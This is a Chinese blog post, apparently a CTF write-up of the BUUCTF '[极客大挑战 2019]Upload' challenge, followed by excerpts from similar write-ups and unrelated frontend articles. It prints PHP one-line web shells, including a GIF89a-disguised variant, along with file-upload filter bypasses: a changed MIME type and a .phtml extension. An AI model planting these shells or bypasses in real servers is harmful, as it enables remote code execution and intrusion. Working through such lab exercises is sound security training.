[极客大挑战 2019]Upload

最新推荐文章于 2024-09-17 11:42:54 发布
最新推荐文章于 2024-09-17 11:42:54 发布
阅读量51 收藏
点赞数
文章标签: 前端 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80059204/article/details/134770342
版权

[极客大挑战 2019]Upload

打开靶机之后可以看到是让我们进行文件上传那就上传一个一句话木马试试

<?php @eval($_POST['cmd']);?>

根据提示是让上传一个图片格式的文件,那把该木马一jpg格式上传试试

说我们木马当中包含<?,也就是已经识别出木马;试着跟换木马,对<?进行屏蔽

<script language='php‘>@eval($_POST['cmd']);</script>

上传包含该木马的jpg文件之后得到

也就是说,需要对木马再一次加工,使识别是图片文件(GIF89a图片头文件欺骗的一句话木马

GIF89a? <script language="php">eval($_REQUEST['cmd'])</script>

上传成功,不过jpg无法执行我们想要的功能,需要文件扩展是php,那就试着使用burp进行抓包,对扩展进行更改

将文件更该为php发现还是无法上传,为了进行屏蔽,试着将文件扩展改为phtml

上传成功,最后使用蚁剑链接,在根目录中找到flag即可

注意在添加地址时,由于我们上传木马,地址后缀要加上我们的文件名

Lnre
关注
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2520
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 943
文件上传冲啊!!!!!!
极客挑战2019-upload
m0_73303597的博客
12-11 364
自用
[极客挑战 2019]Upload--BUUCTF
XiaoYeZhu_1314的博客
04-24 575
添加头文件:GIF89a改文件格式为image/jpegcheck。
[极客挑战 2019]Upload 1
徐海洋
02-02 693
[极客挑战 2019]Upload 1
BUUFCTF—[极客挑战 2019]Upload 1
内心不种满鲜花就会长满杂草
05-12 1161
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 856
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 5121
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
极客挑战2019Upload解题
Bird&Bird
10-26 3835
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 950
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1093
Upload=> 文件上传漏洞。
-webkit-box-reflect属性与倒影效果的实现
读心悦
09-13 447
是一个非标准的 CSS 属性,主要用于在 WebKit 浏览器(如 Chrome 和 Safari)中创建元素的倒影效果。这个属性并不是 CSS 规范的一部分,但在实践中经常被用来实现简单而有趣的视觉效果。
Vue使用query传参Boolean类型,刷新之后转换为String问题
q879936814的博客
09-12 447
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
前端项目node版本问题导致依赖安装异常的处理办法
weixin_44703272的博客
09-14 302
解决前端项目中的Node版本问题通常涉及以下步骤:检查项目文档:查看项目是否有特定的Node版本要求,如果有,确保你的Node版本与之兼容。使用Node版本管理器:如nvm(Node Version Manager)或n。它们可以让你在同一台机器上安装和切换不同版本的Node。
前端vue3打印,多页打印,不使用插件(工作中让我写一个打印功能)
最新发布
m0_51798113的博客
09-17 310
getTableData().tableData,其实就是去后端获取参数去了,因为这是公司的前端框架,基于vxe的,包装的方法,获取了一个表格信息,相当于获取参数。说下总体思路,创建一个组件,里面放多个span字段,然后根据父组件传入的参数,生成子组件,最好我们打印子组件的信息即可。这里也很关键,中间我遇到一个问题,那就是经常第一次点击按钮,dom元素没有加载完,就弹出打印框了,所以我加了一个异步事件,还有记得把抽屉关了。
WebGL系列教程六(纹理映射与立方体贴图)
AIGIS的博客
09-12 1314
上一讲我们讲了如何使用索引绘制彩色立方体,还留了一个思考题:怎么让立方体的每个面都保持一个颜色?这一讲我们就来解决这个问题,并引出纹理映射和立方体贴图。其实这个词语还是比较好理解。见名知意,大概意思就是把纹理映射到某个地方,纹理是什么?现在你可以简单的认为纹理就是一张图片。把一张二维的图片映射到一个三维物体的表面,就叫纹理映射。本节我们从如何将立方体每个面的颜色改为相同的颜色开始,介绍到了如何将图片贴到立方体的表面,系统的分析了为什么不能再共用顶点,并将代码进行了修改,以及讲解了纹理坐标的使用。
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值